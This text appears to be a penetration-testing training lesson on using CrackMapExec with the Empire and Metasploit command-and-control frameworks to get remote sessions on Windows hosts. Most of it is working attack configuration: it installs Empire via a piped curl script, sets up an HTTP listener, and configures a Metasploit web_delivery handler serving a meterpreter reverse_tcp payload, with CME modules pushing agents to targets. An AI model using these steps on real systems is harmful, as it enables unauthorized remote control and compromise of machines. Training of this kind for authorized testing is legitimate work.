CME can be integrated with C2 Frameworks such as Empire and Metasploit.
Empire
We can use CrackMapExec to send an agent to connect to our Empire server and get a remote connection.
Downloading the Empire Framework
git clone --recursive https://github.com/BC-SECURITY/Empire.git -q
cd Empire
sudo su
curl -sSL https://install.python-poetry.org | python3 -
poetry install
Set up the Empire Server and configuration files
We have to choose an arbitrary username and password for our Empire server.
poetry run python empire.py server --username empireadmin --password HackTheBoxCME!
Changes in both the CrackMapExec (~/.cme/cme.conf.) and Empire Client configuration files have to be made
cme.conf
[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin #Username choosen for the Empire server
password = HackTheBoxCME! #password choosen for the Empire server
/empire/client/config.yaml
localhost:
host: https://localhost
port: 1337
socketport: 5000
username: empireadmin #Username choosen for the Empire server
password: HackTheBoxCME! #password choosen for the Empire server
autoconnect: true
Connect the Empire Client to the Empire Server and start the listener.
poetry run python empire.py client --config empire/client/config.yaml
We can set an http listener pointing to our attack box IP address on port 8001.
(Empire) > uselistener http
(Empire: uselistener/http) > set Host http://10.129.204.178
(Empire: uselistener/http) > set Port 8001
(Empire: uselistener/http) > execute
Use CME with the module empire_exec.
We can connect an Agent to our Empire infrastructure using the CME empire_exec module. The LISTENER option is to specify which type of listener we just set up.
CME can help us to gain a Metasploit session using the web_delivery handler and module.
Start Metasploit and set up the web_delivery handler
use multi/script/web_delivery
set SRVHOST 10.10.14.139
set SRVPORT 8443
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.139
set LPORT 8002
run -j
As we can see in the image below, the payload is served via a web server on port 8443 on our attacker machine http://10.10.14.139:8443.
Use CME web_delivery
Two options needs to be set:
URL -> refers to to the URL given by Metasploit where our payload is hosted.
PAYLOAD -> used to specify if our payload is for x64 or x32 architecture